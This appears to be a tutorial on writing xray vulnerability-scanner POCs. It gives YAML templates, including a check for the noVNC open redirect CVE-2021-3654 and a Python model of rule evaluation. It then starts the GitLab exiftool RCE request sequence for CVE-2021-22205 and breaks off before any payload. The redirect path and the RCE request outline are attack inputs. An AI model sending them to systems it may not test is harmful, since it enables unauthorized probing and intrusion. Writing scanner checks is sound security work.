Writing a POC
Using xray as an example
Plugin writing
The most basic POC published officially looks like this:
name: poc-yaml-example-com
# script section
transport: http
rules:
  r1:
    request:
      method: GET
      path: "/"
    expression: |
      response.status==200 && response.body.bcontains(b'Example Domain')
expression: r1()
# information section
detail:
  author: name(link)
  links:
    - http://example.com
Editor for writing POCs
POC practice
CVE-2021-3654
Path handling is broken: appending //example.com/%2f.. to the site's domain triggers a URL redirect.
It is a plain GET request, so the POC is very simple; anyone can write it.
name: poc-yaml-novnc-url-redirection-cve-2021-3654
manual: true
transport: http
rules:
  - method: GET
    path: "//baidu.com/%2f.."
    follow_redirects: false
    expression: |
      response.headers['location']=="//baidu.com/%2f../"
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://seclists.org/oss-sec/2021/q3/188
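To make the two POCs above concrete, here is an added example, not code from xray or from this page's author, that models offline how an xray rule is evaluated against an HTTP response: the template's `r1` rule (status 200 plus a body substring) and the CVE-2021-3654 rule (an exact match on the `Location` header of the unfollowed 3xx). The `Response` and `Rule` classes, the `fake_transport()` stub standing in for a target server, and the `poc_matches()` helper are all assumptions made for illustration; the third rule set deliberately drops `follow_redirects: false` to show why the flag is needed for a redirect check.

```python
# Added example (not xray's own code): offline model of xray POC rule evaluation.
from dataclasses import dataclass, field
from typing import Callable, Dict


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""

    def header(self, name: str) -> str:
        # header lookup is case-insensitive, like the response.headers map in a POC
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return ""


@dataclass
class Rule:
    # mirrors the method/path/follow_redirects/expression fields of a YAML rule
    method: str
    path: str
    expression: Callable[[Response], bool]
    follow_redirects: bool = True


def fake_transport(method: str, path: str, follow_redirects: bool) -> Response:
    """Constructed stand-in for a target: '/' is a static page, and the
    '//baidu.com/%2f..' path answers with a 302 to an external host."""
    if path == "/":
        return Response(200, {"Content-Type": "text/html"},
                        b"<title>Example Domain</title>")
    if path == "//baidu.com/%2f..":
        if not follow_redirects:
            return Response(302, {"Location": "//baidu.com/%2f../"})
        # a client that follows the redirect only ever sees the final page
        return Response(200, {"Content-Type": "text/html"},
                        b"<title>somewhere else</title>")
    return Response(404)


def run_rules(rules: Dict[str, Rule], transport) -> Dict[str, bool]:
    """Send each rule's request and evaluate its expression on the reply.
    The top-level 'expression: r1()' of the template is then results['r1']."""
    results = {}
    for name, rule in rules.items():
        resp = transport(rule.method, rule.path, rule.follow_redirects)
        results[name] = rule.expression(resp)
    return results


# rule r1 of the official template: status==200 && body.bcontains(b'Example Domain')
EXAMPLE_RULES = {
    "r1": Rule("GET", "/",
               lambda r: r.status == 200 and b"Example Domain" in r.body),
}

# rule of the CVE-2021-3654 POC; follow_redirects=False keeps the 3xx visible
REDIRECT_RULES = {
    "r1": Rule("GET", "//baidu.com/%2f..",
               lambda r: r.header("location") == "//baidu.com/%2f../",
               follow_redirects=False),
}

# same expression but with the default follow_redirects=True: the check cannot fire
REDIRECT_RULES_FOLLOWING = {
    "r1": Rule("GET", "//baidu.com/%2f..",
               lambda r: r.header("location") == "//baidu.com/%2f../"),
}


def poc_matches(rules: Dict[str, Rule], transport=fake_transport) -> bool:
    """True when the POC's top-level expression r1() holds for this transport."""
    return run_rules(rules, transport)["r1"]


if __name__ == "__main__":
    print("example.com template:", poc_matches(EXAMPLE_RULES))              # True
    print("cve-2021-3654, no follow:", poc_matches(REDIRECT_RULES))         # True
    print("cve-2021-3654, following:", poc_matches(REDIRECT_RULES_FOLLOWING))  # False
```

The third result is the practical point: a redirect POC must keep `follow_redirects: false`, otherwise the scanner's HTTP client consumes the 302 and the expression only ever sees the final 200, so a vulnerable host is reported as clean.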
CVE-2021-22205
RCE caused by exiftool parsing
Two requests are sent in total.
Request 1:
GET /users/sign_in HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Obtain the csrf-token.
Request 2:
POST /uploads/user HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundar